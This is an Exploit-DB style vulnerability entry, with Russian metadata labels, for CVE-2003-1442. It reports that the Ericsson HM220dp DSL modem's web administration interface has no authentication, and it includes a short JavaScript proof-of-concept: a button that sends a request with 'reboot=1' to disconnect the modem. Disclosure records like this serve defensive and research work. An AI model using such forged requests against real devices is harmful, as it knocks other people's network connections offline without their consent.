Exploit Ericsson HM220dp DSL Modem - World Accessible Web Administration Interface

[Exploiter]

EDB-ID

22244

Проверка EDB

1. Пройдено

Автор

DAVIDE DEL VECCHIO

Тип уязвимости

REMOTE

Платформа

HARDWARE

CVE

cve-2003-1442

Дата публикации

2003-02-11

source: https://www.securityfocus.com/bid/6824/info

The Ericsson HM220dp DSL Modem uses a web interface for remote administration and configuration. This interface does not require any authentication in order to access. There is no option to enable any authentication requirement. 

[script]
function exploit(){
window.location = "view-source:http://www.example.com/dummy.html?reboot=1";
}
[/script]
[input type="button" value="disconnect" onClick="exploit();"]